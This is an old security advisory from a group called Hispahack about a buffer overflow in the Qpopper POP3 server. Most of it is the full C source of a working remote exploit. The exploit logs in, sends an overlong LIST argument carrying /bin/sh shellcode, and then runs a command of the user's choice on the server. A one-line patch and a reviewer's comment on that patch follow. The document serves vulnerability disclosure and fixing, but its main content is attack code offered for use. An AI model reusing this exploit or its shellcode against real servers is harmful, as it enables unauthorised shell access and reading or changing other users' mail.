!Hispahack Research Team
http://hispahack.ccc.de

Program: Qpopper <= 3.0beta29 (2.53 and older are not vulnerable)
Platform: *nix
Risk: Remote access
Author: Zhodiac
Date: 20/1/2000

- Problem:
===========

The nowadays very common qpop POP3 server is one of the best servers around; it implements some features not found in a normal pop3d. Like almost all software it has some security bugs. In this case, once you have passed the login process you can execute malicious code thanks to a buffer overflow. With this buffer overflow (in the second argument of the LIST command) you can execute malicious code with the uid of the user you logged in as, and with gid mail. Because of that mail gid, on some systems you can read all the mail of other users and even change or delete it.

- Exploit:
==========

For proof of vulnerability we release the Linux x86 xploit. But be aware: the lack of a public xploit for your system does not mean you can't be hacked. The vulnerability exists, fix it!

------- qpop-xploit.c ----------
Modified by missnglnk
Allows you to specify the command to execute and adds network support, so netcat is no longer needed.

/*
 * !Hispahack Research Team
 * http://hispahack.ccc.de
 *
 * By Zhodiac
 *
 * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
 * Overflow at pop_list()->pop_msg()
 *
 * Tested: 3.0beta28 offset=0
 *         3.0beta26 offset=0
 *         3.0beta25 offset=0
 *
 * #include
 *
 * This code is dedicated to my love [CrAsH]] and to all the people who
 * were raided in Spain in the last few days.
 *
 * Madrid 10/1/2000
 *
 * missnglnk
 * - Allows you to specify the command to execute on the remote host,
 *   and added network support to the program so you do not need netcat
 *   to use this.
*/

/*
 * NOTE(review): the eight #include directives below lost their header
 * names when this page was extracted (angle brackets were stripped); the
 * same happened to the argument placeholders in usage() and to the address
 * in the header comment above.  They are left as found rather than guessed.
 */
#include
#include
#include
#include
#include
#include
#include
#include

/* Length of the LIST argument that is built, including its trailing NUL. */
#define BUFFERSIZE 1004
/* Fill byte for the part of the buffer in front of the payload. */
#define NOP 0x90
/* Value written four times after the payload; argv[5], if given, is added to it. */
#define OFFSET 0xbfffd9c4
// #define OFFSET 0x0

/*
 * Hard-coded payload for Linux/x86.  The only human-readable part is the
 * literal "/bin/sh" at its end.  From the defender's side that is also the
 * on-wire signature of this tool: a POP3 "LIST 1 " command whose second
 * argument is about a thousand bytes, dominated by 0x90, and containing
 * that string -- something an IDS rule or a capture review can match on.
 */
char shellcode[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
"\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";

/*
 * Print the invocation line to stderr and exit(1).  The placeholders that
 * followed "%s" were lost in extraction (see the note above the includes).
 */
void usage(char *progname)
{
    fprintf(stderr,"Usage: (%s []\n",progname);
    exit(1);
}

/*
 * Entry point.  argv[1] is the host, argv[2] the user, argv[3] the password,
 * argv[4] a line to send after the LIST command, argv[5] an optional delta
 * (atol) added to OFFSET.  USER and PASS are sent and must be answered with
 * "+OK" before the long LIST line goes out, so this is a post-authentication
 * issue: exposure is limited to holders of valid credentials, and the impact
 * described in the advisory is that user's uid plus gid mail.
 *
 * Returns 0 on success, -1 after perror() on any socket failure or after a
 * non-"+OK" reply to the banner, USER or PASS.
 */
int main(int argc, char **argv)
{
    char *ptr,buffer[BUFFERSIZE],rcvbuf[4096],username[128],password[128],exploit[4096],command[4096];
    unsigned long *long_ptr,offset=OFFSET;
    int aux,sock;
    struct sockaddr_in sin;
    unsigned long ip;
    struct hostent *he;

    fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
    fprintf(stderr,"Qpopper xploit by Zhodiac \n\n");

    if (argc<5) usage(argv[0]);
    if (argc==6) offset+=atol(argv[5]);

    /*
     * Build the LIST argument: BUFFERSIZE-strlen(shellcode)-16 bytes of NOP,
     * the payload, then offset repeated four times (the 16 matches four
     * 4-byte longs, i.e. a 32-bit build), then a NUL.
     */
    ptr=buffer;
    memset(ptr,0,sizeof(buffer));
    memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
    ptr+=sizeof(buffer)-strlen(shellcode)-16;
    memcpy(ptr,shellcode,strlen(shellcode));
    ptr+=strlen(shellcode);
    long_ptr=(unsigned long*)ptr;
    for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
    ptr=(char *)long_ptr;
    /* NOTE(review): ptr is now buffer+BUFFERSIZE, so this NUL is stored one
     * byte past the end of buffer (its last in-bounds index is BUFFERSIZE-1). */
    *ptr='\0';

    /* NOTE(review): strlen() yields size_t but is printed with %d. */
    fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
    fprintf(stderr,"Offset: 0x%lx\n\n",offset);

    /* The four newline-terminated lines sent to the server, in this order. */
    snprintf(username, sizeof(username), "USER %s\n",argv[2]);
    snprintf(password, sizeof(password), "PASS %s\n",argv[3]);
    snprintf(exploit, sizeof(exploit), "LIST 1 %s\n",buffer);
    snprintf(command, sizeof(command), "%s\n", argv[4]);

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("socket()");
        return -1;
    }

    /* Resolve argv[1] by name first, then fall back to a dotted quad.
     * NOTE(review): inet_addr() returns an integer, so comparing it with
     * NULL only catches 0.0.0.0, not the INADDR_NONE failure value. */
    if ((he = gethostbyname(argv[1])) != NULL) {
        ip = *(unsigned long *)he->h_addr;
    } else {
        if ((ip = inet_addr(argv[1])) == NULL) {
            perror("inet_addr()");
            return -1;
        }
    }
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = ip;
    sin.sin_port = htons(110);   /* POP3 */
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("connect()");
        return -1;
    }

    /* Banner.  Every reply below is printed with its last character (the
     * newline) chopped off.  NOTE(review): read()'s byte count is never used
     * to NUL-terminate rcvbuf; the bzero() calls cover the later rounds, but
     * this first strstr() runs over whatever the stack held. */
    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("read()");
        return -1;
    }
    if (strstr(rcvbuf, "+OK") == NULL) {
        printf("Server didnt respond with ok\n");
        rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
        printf("\t%s\n", rcvbuf);
        return -1;
    }
    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    /* USER: must be acknowledged with "+OK". */
    if (write(sock, username, strlen(username)) < strlen(username)) {
        perror("write()");
        return -1;
    }
    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("read()");
        return -1;
    }
    if (strstr(rcvbuf, "+OK") == NULL) {
        printf("Server didnt respond with username ok\n");
        rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
        printf("\t%s\n", rcvbuf);
        return -1;
    }
    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    /* PASS: must be acknowledged with "+OK". */
    if (write(sock, password, strlen(password)) < strlen(password)) {
        perror("write()");
        return -1;
    }
    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("read()");
        return -1;
    }
    if (strstr(rcvbuf, "+OK") == NULL) {
        printf("Server didnt respond with password ok\n");
        rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
        printf("\t%s\n", rcvbuf);
        return -1;
    }
    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    /* The overlong LIST line.  On the server side the advisory's patch caps
     * the argument that pop_msg() echoes back in "Unknown LIST argument"
     * to 128 bytes ("%.128s"), which, per the advisory, stops this input. */
    if (write(sock, exploit, strlen(exploit)) < strlen(exploit)) {
        perror("write()");
        return -1;
    }
    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("read()");
        return -1;
    }
    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    /* argv[4] sent as-is, followed by a single read of whatever comes back. */
    if (write(sock, command, strlen(command)) < strlen(command)) {
        perror("write()");
        return -1;
    }
    if (read(sock, rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("read()");
        return -1;
    }
    rcvbuf[(strlen(rcvbuf) - 1)] = '\0';
    printf("\t%s\n", rcvbuf);
    bzero(rcvbuf, sizeof(rcvbuf));

    if (close(sock) < 0) {
        perror("close()");
        return -1;
    }
    return(0);
}
------- qpop-xploit.c --------- - Fix: ====== Best solution is to wait for a new patched version, meanwhile here you have a patch that will stop this attack (be aware that this patch was not done after a total revision of the code, maybe there are
some other overflows).

------ pop_list.patch ---------
77c77
< return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s",
---
> return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",
------ pop_list.patch ---------

piscis:~# patch pop_list.c pop_list.patch
piscis:~#

Spain r0x

Greets :)

Zhodiac
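Review bot: The `%.128s` precision on the changed line 77 bounds only the argument that this one pop_msg() call formats, while the advisory itself locates the overflow in pop_msg() and warns that the rest of the code was not reviewed. Any other pop_msg() caller that passes a client-controlled string through a plain `%s` is therefore still exposed by this patch. The durable fix is inside pop_msg() itself: format into its message buffer with a size-bounded call such as vsnprintf() and check the result, so that no caller can overflow it regardless of its format string; the per-caller truncation can remain as defence in depth. Only the one changed line of pop_list() is shown here, so whether other callers exist cannot be confirmed from this page.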